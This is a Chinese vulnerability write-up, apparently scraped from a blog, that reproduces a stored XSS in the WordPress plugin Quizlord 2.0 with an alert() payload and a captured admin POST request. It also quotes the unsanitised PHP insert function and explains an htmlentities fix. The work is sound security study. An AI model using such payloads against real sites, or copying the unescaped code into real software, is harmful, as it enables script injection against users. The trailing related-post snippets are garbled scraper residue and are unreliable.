2. 程式人生 > >【漏洞復現】WordPress插件Quizlord 2.0 XSS漏洞復現與分析

【漏洞復現】WordPress插件Quizlord 2.0 XSS漏洞復現與分析

阿新 發佈:2019-02-17
secure images post form 簡單的 wow 簡單 這樣的 出現

年後趁著需要做安全測試系統不多的這個空檔,學學python到處逛逛復現復現和分析一些簡單的漏洞

0x00 復現環境

  1. phpstudy
  2. wordpress 4.4版本

貌似WordPress爆出漏洞的通常基本大多都是它的插件存在安全問題。

0x01步驟

使用phpstudy搭建環境,搭建wordpress,然後登陸進後臺去下載Quizlord插件,版本為2.0
一切就緒後就開始看怎麽觸發的XSS了

3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.

--from exploit-db

XSS註入點:title

技術分享圖片

request包

POST /wp4.4/wordpress/wp-admin/admin.php HTTP/1.1
Host: localhost
Content-Length: 184
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/wp4.4/wordpress/wp-admin/admin.php?page=quizlord
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7C43a2436e074320bb113475ff8e44222065a4454e602d990d36639085856f0dd3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7Cf23acf621ce28dbfc8f0baf9abe31370d3fc5674ca575a4ba1029832ca552c62; wp-settings-time-1=1550197219; pgv_pvi=4214545408; Phpstorm-c3dafaf3=cd60577d-e9ad-4825-b2e4-7a109a7e2faf; PHPSESSID=8v8jf1s93dprjgq4bpo29ldsq7
Connection: close

action=ql_insert&title=%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=1&time=0&numbtype=numerical&numbmark=1&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save

效果當然是觸發啊 代碼裏一點過濾都沒有 這算一個存儲型XSS

技術分享圖片

0x02漏洞原理分析

知其然要知其所以然,下面我們來看問題出現在哪個環節
進入Quizlord插件目錄,找到quizlord.php,打開
出問題的是這段函數 title沒有被過濾盒轉義就直接寫進數據庫裏面了

function ql_insert_quiz_data(){
    global $wpdb;
    if(!empty($_POST[‘title‘])){
        $ql_title = $_POST[‘title‘];
        $ql_description = $_POST[‘description‘];
        $ql_time = $_POST[‘time‘];
        $ql_rightcolor = "#".$_POST[‘rightcolor‘];
        $ql_wrongcolor = "#".$_POST[‘wrongcolor‘];
        $ql_numbtype = $_POST[‘numbtype‘];
        $ql_numbmark = $_POST[‘numbmark‘];
        $ql_showtype = $_POST[‘showtype‘];

        $ql_random = isset($_POST[‘random‘]) ? 1 : 0;
        $ql_skip = isset($_POST[‘skip‘]) ? 1 : 0;
        $ql_resume = isset($_POST[‘resume‘]) ? 1 : 0;
        $ql_backbtn = isset($_POST[‘backbtn‘]) ? 1 : 0;
        $ql_autoload = isset($_POST[‘autoload‘]) ? 1 : 0;
        $ql_checkcnt = isset($_POST[‘checkcnt‘]) ? 1 : 0;

        $wpdb->insert($wpdb->prefix.‘ql_quizzes‘,
        array(
            ‘name‘ => $ql_title,
            ‘description‘ => $ql_description,
            ‘time‘ => $ql_time,
            ‘right_color‘ => $ql_rightcolor,
            ‘wrong_color‘ => $ql_wrongcolor,
            ‘numbering_type‘ => $ql_numbtype,
            ‘numbering_mark‘ => $ql_numbmark,
            ‘show_type‘ => $ql_showtype,
            ‘random‘ => $ql_random,
            ‘skip‘ => $ql_skip,
            ‘resume‘ => $ql_resume,
            ‘autoload‘ => $ql_autoload,
            ‘back_button‘ => $ql_backbtn,
            ‘check_continue‘ => $ql_checkcnt
        ));
    }
    wp_redirect($_SERVER[‘HTTP_REFERER‘]);
    exit();
}

add_action(‘admin_action_ql_insert‘, ‘ql_insert_quiz_data‘);

0x03 漏洞PoC

待寫

0x04 漏洞修復

利用htmlentities()函數轉義html實體。

剛開始的時候想 我一開始都插入payload進數據庫了。不如就在輸出的位置做轉義吧
於是定位到輸出的代碼,修改成<?php echo htmlentities($qlq->name); ?>
技術分享圖片
輸出就變成正常了,無辦法觸發XSS漏洞。
技術分享圖片

如果在輸入點進行轉義的話,定位的到輸入賦值的位置,加入 $ql_title = htmlentities($_POST[‘title‘])即可
技術分享圖片

這樣的情況最好在輸入輸出點都做轉義,這樣就保障得多了
0x05 Reference

https://www.exploit-db.com/exploits/45307 詳細的漏洞細節以及復現方法
https://www.freebuf.com/vuls/189814.html 中文版的這哥們也寫了

【漏洞復現】WordPress插件Quizlord 2.0 XSS漏洞復現與分析

相關推薦

漏洞復現WordPressQuizlord 2.0 XSS漏洞復現分析

secure images post form 簡單的 wow 簡單 這樣的 出現 年後趁著需要做安全測試系統不多的這個空檔,學學python到處逛逛復現復現和分析一些簡單的漏洞 0x00 復現環境 phpstudy wordpress 4.4版本 貌似WordPres

蜂鳥檢視FengMap JavaScript SDK v1.2.0 “熱力”上新!

微信應用號發放內測邀請的訊息,炸圈兒了。好多人在說“HTML5方面行業缺人啦~移動網際網路的規則要重建啦~哎呀~” 蜂兒想說:不要著急~不要驚慌~這不是有蜂兒在嘛,你怕啥啊,蜂兒早就給你準備好了FengMap JavaScript SDK啊! 這是一套基於瀏覽器的應用

wordpress Simple Social Buttons import處漏洞復現

ons ihe tex style min 安裝插件 插件 www 啟用 前言: 漏洞範圍範圍:simple socail buttons v2.0.4到v2.0.22之間的所有版本 利用條件,wordpress的普通用戶 漏洞細節:該插件缺少權限的檢查,非管理管權限

jQuerycookie

tostring options pat ret path spa prototype 直觀 emp 通過該插件的學習使我對cookie、Date()、getDate()、setDate()、toUTCString()有了更直觀的了解,具體分析見註釋: function(k

Eclipse提高開發速度-安裝VJET,JS等提示開發

cau sof sta scrip update 1.4 spa text article 1、安裝Apache Batik CSS 一般安裝VJET插件會出現 Cannot complete the install because one or more requir

漏洞預警CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

art cal mage http test ip地址 get for oot 早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NS

jQueryjquery封裝

been methods 存在 arr 追加 20px blue init方法 asn 擴展jQuery插件開發的基本知識,最佳做法和常見的陷阱。 入門 編寫一個jQuery插件開始於給jQuery.fn加入??新的功能屬性,此處添加的對象屬性的名稱就是你插件的名稱:

修復wordpress編輯器漏洞

body clas config fig 16px 簡單 mic fine define 具體方法,將下面的代碼添加到您的配置文件 wp-config.php中: define( ‘DISALLOW_FILE_EDIT‘, true ); 以此關閉插件編輯器功能,一切就這麽

MybtaisMybatis Plugin開發(一)動態代理步步解析

發現 返回 交集 hand proc 攔截 and mybatis invoke 需求:   對原有系統中的方法進行‘攔截’,在方法執行的前後添加新的處理邏輯。 分析:   不是辦法的辦法就是,對原有的每個方法進行修改,添加上新的邏輯;如果需要攔截的方法比較少,選擇此方法到

PHP系列PHP組詳解

命令行 分享 .cn .com function package etc quest 說我 緣起 楓爺之前做過幾年的PHP的研發,大部分都是在開源框架的引導下,編寫代碼。現在依然,本能的會去讓我使用某個PHP框架開發PHP應用,也是因為懶吧,沒有好好的去研究研究除了框架之外

技術鄰學院 直播預告|進階simufact軟焊接仿真工藝培訓

技術分享 教學 過程 高級工程師 力學 案例 評論 代理 電子 技術鄰學院 直播預告 【進階】simufact軟件焊接仿真工藝培訓 (6月10日) 直播信息 日期: 2017年6月10日(星期六)20:00--21:30 直播地址: 熊貓直播http://pan

PoEdu - Windows階段班 Po學校Windows編程 Lesson004_003-2操作

環境 語言 設定 out msdn str 函數 示例 encrypt 001_函數的不同版本 HANDLE : CreateFile()函數返回一個內核對象的句柄 WINAPI : 一種調用約定,調用方式。 _In_ 與 _In_opt_ : 本身沒有意義,一個說

很好用的谷歌字體以及Gravatar頭像一鍵替換WordPress----WP Acceleration for China

ati 以及 content none 應對 集合 .org ref 多余 WordPress總是被新上手的朋友詬病說速度慢,其實多半都要歸功於谷歌字體的功勞。在應對字體這個問題的時候,大家都會有各種不同的解決方案。今天我給大家推薦一款插件,它集合了多個替代方案,可以方便的

wordpress開發掛載css和js

blog ima class code -i _file__ res install mage define( ‘CSS‘, plugin_dir_url( __FILE__ ) . ‘css/‘ );//定義css根目錄 define( ‘JS‘, plugin

spring boot配置文 application.properties 屬性解析

date hiberna mage ida str 數據丟失 art rop 就會 1.JPA命名策略 spring.jpa.hibernate.naming-strategy = org.hibernate.cfg.DefaultNamingStrategy 有兩種值

批處理TXT文批量轉HTML文工具

電子 程序 for ims 記事本 批處理 dexp 4.0 到你 說到批量轉html文件,相信喜歡看小說或經常制作電子書和教程的朋友應該很熟悉。因為,我們每次都會面臨成千上萬的txt文件,要將其轉換為能正確顯示的html文件是很麻煩的。當然,現在有很多的軟件也可以實現,但

Python系列HDF5文介紹

常用 mil data gda splay labels 數據壓縮 zeros size 一個HDF5文件是一種存放兩類對象的容器:dataset和group. Dataset是類似於數組的數據集,而group是類似文件夾一樣的容器,存放dataset和其他group。在使

BZOJ 1221 [HNOI2001] 軟開發

php spfa pen href spa gin main cost 題意 【鏈接】 我是鏈接,點我呀:) 【題意】 在這裏輸入題意 【題解】 /* 設一個超級源點S和超級匯點T S和2*i-1各連一條容量為ni的邊。 花費

LINUX 6——安裝samba實現用戶訪問文共享傳輸服務(新手詳解)

名單 表名 users lock path 註釋 eat 修改配置 centos6.5 LINUX 6——安裝samba用戶訪問文件共享傳輸服務 ----------------------------------------安裝環境--------------------

基於Python3的漏洞檢測工具 ( Python3 式框架 )

lang gin detection print shel load nec list auto [TOC] Python3 漏洞檢測工具 -- lance lance, a simple version of the vulnerability detection fra